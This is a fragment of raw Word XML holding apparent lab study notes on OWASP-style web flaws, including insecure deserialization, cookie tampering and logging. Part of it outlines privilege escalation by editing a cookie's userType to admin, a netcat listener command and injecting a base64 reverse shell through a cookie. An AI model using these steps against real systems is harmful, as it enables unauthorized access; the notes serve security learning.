        <w:t>Serialization is the process of converting objects used in programming into simpler, compatible formatting for transmitting between systems or networks for further processing/storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798D0ADB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Deserialization is the reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E65A96" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">Plaintext </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> binary for transport; binary </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> plaintext for application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2DFD0A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Insecure deserialization occurs when data from an untrusted party gets executed due to lack of filtering/input validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61514C96" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Insecure Deserialization – Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F3FC2C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Expiry timers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591DEA1E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Cookie name – required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAB5B56" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Cookie value – plaintext/encoded – required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DBD54D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Secure only – only sent over HTTPS – not required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3792A38B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Expiry – timestamp when cookie is removed from browser – not required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F98EAA9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Path – cookie only sent if specified URL is in request – not required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786EFCBB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Insecure Deserialization – Cookies Practical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E279A2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Inspect element when within profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6124AE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">Storage tab </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC8DF1C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Check for encoded, base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6123FBFA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Decode echo ‘&lt;base64 string&gt;’ | base64 --decode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C86989C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>userType – change from user to admin?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12997D01" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Then navigate to URL /admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255D4B28" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Insecure Deserialization – Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0719156D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Vulnerability via comment input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6857AC8B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Input would be encoded and sent to Flask application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0683484F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Application assumes encoded data is trustworthy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7579C32E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Start with creating netcat listening post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B41BCA9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>“nc -lvnp 4444”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EF9077" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Due to cookie encoding in base64, reverse shell cannot be a straightforward spawn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1885DC61" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Commands must be encoded in base64 (or same encryption)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62644316" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Source code on github</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6E98A1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Replace IP with attacker IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE23913" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Create python exe and run for encoded text string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB4468D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Paste base64 encoded shell into encodedPayload cookie value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78034EFC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Refresh page and confirm connection with listening post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FA097E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Use find, grep commands to search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604AE8A2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Components with Known Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CB8218" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Service and version discovery + OSINT = discovery of usage of components with known vulns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4A9421" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Exploit-db to try and find an exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E21A5C9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>When using an exploit script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE1C3CC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Input arguments should be contained in quotes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F21304A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Unauthenticated remote code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17467627" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Insufficient Logging and Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052F85E5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Regulatory damage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B305FDC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Risk of further attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DA4134" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Information Stored should include</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25045045" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>HTTP status codes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31881B84" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Time Stamps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D94767C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53926397" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>API endpoints/page locations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32036AF4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482AD6FA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
